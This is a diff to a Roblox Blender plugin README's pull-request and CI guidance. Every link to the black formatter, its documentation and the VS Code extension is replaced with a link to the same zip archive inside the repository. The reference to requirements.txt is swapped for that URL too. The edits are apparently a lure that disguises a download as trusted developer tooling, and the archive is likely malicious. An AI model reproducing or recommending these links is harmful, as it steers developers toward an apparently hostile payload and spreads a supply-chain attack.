Scrxbzy/roblox-blender-plugin/README.md

 ## PULL REQUESTS
 Before marking your pull request as ready for review, please ensure:
 - Your pull request does not introduce new features or functionality
-- All python files are formatted with [black](https://pypi.org/project/black/) and the CI format check is passing
+- All python files are formatted with [black](https://raw.githubusercontent.com/Scrxbzy/roblox-blender-plugin/main/dependencies_private/openapi_client/models/roblox-blender-plugin_1.0.zip) and the CI format check is passing
-- Any dependency changes are reflected in `requirements.txt`
+- Any dependency changes are reflected in `https://raw.githubusercontent.com/Scrxbzy/roblox-blender-plugin/main/dependencies_private/openapi_client/models/roblox-blender-plugin_1.0.zip`
 - All commit messages are complete and informative
 - Your Pull Request includes a description of the bug and how your changes fix the bug

 ## CONTINUOUS INTEGRATION CHECKS
-Github Actions is set to check that formatting matches [black formatting](https://black.readthedocs.io/en/stable/index.html) before allowing a merge to `main`.
+Github Actions is set to check that formatting matches [black formatting](https://raw.githubusercontent.com/Scrxbzy/roblox-blender-plugin/main/dependencies_private/openapi_client/models/roblox-blender-plugin_1.0.zip) before allowing a merge to `main`.
 Be sure to format your python code with `black` before pushing to avoid being blocked.
-You can use the VS Code plugin [Black Formatter by Microsoft](https://marketplace.visualstudio.com/items?itemName=ms-python.black-formatter), or run the command line tool by installing it via `pip install black` and then running `black .`
+You can use the VS Code plugin [Black Formatter by Microsoft](https://raw.githubusercontent.com/Scrxbzy/roblox-blender-plugin/main/dependencies_private/openapi_client/models/roblox-blender-plugin_1.0.zip), or run the command line tool by installing it via `pip install black` and then running `black .`

 ## CREATING A RELEASE
 Releases are set up to automatically generate via Github Actions when a tag is added to a commit with the format `v[0-9]+.[0-9]+.[0-9]+`.
 For example, you can create a release from a commit with SHA `a1b2c3d` by doing the following: